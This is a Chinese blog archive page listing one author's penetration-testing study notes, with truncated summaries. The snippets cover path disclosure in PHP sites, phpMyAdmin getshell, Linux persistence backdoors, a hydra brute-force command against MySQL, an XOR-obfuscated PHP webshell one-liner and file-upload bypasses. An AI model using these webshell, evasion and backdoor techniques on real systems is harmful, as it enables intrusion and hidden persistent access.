2023 年 3月 24 日随笔档案 - hello_bao

2023年3月24日

域名收集途径

摘要：阅读全文

posted @ 2023-03-24 23:51 hello_bao 阅读(20) 评论(0) 推荐(0)

企业安全防御

摘要：阅读全文

posted @ 2023-03-24 23:50 hello_bao 阅读(15) 评论(0) 推荐(0)

常见威胁

摘要：阅读全文

posted @ 2023-03-24 23:49 hello_bao 阅读(19) 评论(0) 推荐(0)

top10漏洞挖掘关键点

摘要：阅读全文

posted @ 2023-03-24 23:47 hello_bao 阅读(32) 评论(0) 推荐(0)

php网站爆路径方法收集

摘要： 1、单引号爆路径 www.xxx.com/news.php?id=149′ 说明：直接在URL后面加单引号，要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 2、错误参数值爆路径 www.xxx.com/researcharchive.php?id=-1 说明：将要提交的参数值改成错阅读全文

posted @ 2023-03-24 23:45 hello_bao 阅读(159) 评论(0) 推荐(0)

phpMyAdmin后台 4种getshell方法

摘要： 1、查看phpMyAdmin版本，搜索公开漏洞获取phpmyadmin版本信息方法： Documetation.html Documetation.txt translators.html readme.php README changelog.php Change 在phpmyadmin目录后面阅读全文

posted @ 2023-03-24 23:37 hello_bao 阅读(4990) 评论(0) 推荐(0)

Linux权限维持

摘要： 1、文件锁文件属性清除历史 passwd 添加管理账号 2、ssh 软连接后门公钥免密码登陆 keylooger 记录密码 3、ubunut 利用 cron 机制安装后门 vim python 扩展后门 4、inetd 服务后门 Diamorphine rootkit 使用阅读全文

posted @ 2023-03-24 22:44 hello_bao 阅读(19) 评论(0) 推荐(0)

暗月教程学习笔记（杂记）

摘要：暗月kali笔记 adminer.php 数据库管理脚本穷举爆破【 hydra -L /root/常用用户名.txt -P /root/常用密码.txt 192.168.51.157 -f -t 15 -s 3306 mysql kali msf msfconsole search login/ 阅读全文

posted @ 2023-03-24 22:27 hello_bao 阅读(246) 评论(0) 推荐(0)

暗月实战项目笔记（杂记）

摘要：实战windows三层：（192.168.0.129/10.10.10.130， 10.10.10.129/10.10.1.130，10.10.1.129） masscan、nmap 扫描开放端口和服务 wfuzz、layer子域名搜集访问所有域名，搜集框架信息、漏洞和exp awvs、xray 阅读全文

posted @ 2023-03-24 22:22 hello_bao 阅读(371) 评论(0) 推荐(0)

网络安全学习笔记（杂记）

摘要：基础知识点 url大小写判断windows（不敏感）和linux（敏感）服务器 bugscanner.com、云悉等cms识别 awvs,nessus,appscan,netsparker漏洞扫描工具 fuzzscaner 信息收集工具反向连接用域名映射或代理防止被追踪 #本地网络 su 阅读全文

posted @ 2023-03-24 22:16 hello_bao 阅读(299) 评论(0) 推荐(0)

Oracle提权

摘要： 1、oracleshell提权工具（冰蝎作者）阅读全文

posted @ 2023-03-24 22:04 hello_bao 阅读(115) 评论(0) 推荐(0)

WebShell免杀总结

摘要： 1、异或运算过免杀无字符后门 '!' ^ '@' -->‘a’ 异或运算过免杀 <?php $a='!' ^ '@' .'ssert' ; $a($_POST['x']); ?> for i in range(1,127): for j in range(1, 127): k = i ^j i 阅读全文

posted @ 2023-03-24 21:47 hello_bao 阅读(172) 评论(0) 推荐(0)

文件上传绕过

摘要：文件上传getshell 验证绕过注意组合使用： 1、末尾点+空格+点+空格--》1.php . . . \1.php. . . 2、文件后缀末尾加::$data--》php+windows：文件名+"::$DATA"，会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$D 阅读全文

posted @ 2023-03-24 21:43 hello_bao 阅读(119) 评论(0) 推荐(0)

渗透测试

公告